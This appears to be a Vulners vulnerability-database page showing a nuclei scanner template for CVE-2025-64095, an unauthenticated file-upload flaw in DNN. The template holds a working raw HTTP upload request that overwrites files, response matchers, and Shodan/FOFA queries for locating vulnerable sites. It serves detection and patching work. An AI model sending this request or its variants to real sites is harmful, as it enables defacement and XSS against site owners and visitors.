Lucene search
K

DNN - Unrestricted Arbitrary File Upload

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

DNN before 10.1.1 allows unauthenticated file uploads and overwriting files, enabling XSS.

Related
Refs
Code
id: CVE-2025-64095

info:
  name: DNN - Unrestricted Arbitrary File Upload
  author: DhiyaneshDk,pussycat0x
  severity: critical
  description: |
    DNN (formerly DotNetNuke) \u003C 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can upload and overwrite files, leading to website defacement and cross-site scripting attacks.
  remediation: |
    Update to version 10.1.1 or later.
  reference:
    - https://github.com/h4x0r-dz/CVE-2025-64095---DNN-Unauthenticated-arbitrary-file-upload
  metadata:
    verified: true
    max-request: 1
    vendor: dnnsoftware
    product: dotnetnuke
    shodan-query:
      - "Set-Cookie: dnn_IsMobile"
      - http.favicon.hash:-1465479343
    fofa-query:
      - app="dotnetnuke"
      - "Set-Cookie: dnn_IsMobile"
      - icon_hash="-1465479343"
  tags: cve,cve2025,intrusive,file-upload,dnn,vkev

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------7RKjWLYyrhvUn2AA31fJQ3

        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="file"; filename="{{filename}}.png"
        Content-Type: image/png

        {{randstr}}
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="storageFolderID"

        1
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="portalID"

        0
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="overrideFiles"

        1
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="mode"

        Default
        --------------------------7RKjWLYyrhvUn2AA31fJQ3--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"group"'
          - 'delete_type'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220756a18de0cdc3ace6e4650ae86ac2487c1d462b38358f70237bf83b7d148d778022100c6a3060b167abed05219a2fb8bbd56959619960db32c3d7285e140e45a557b9e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.19.8 - 10
EPSS0.44656
SSVC
28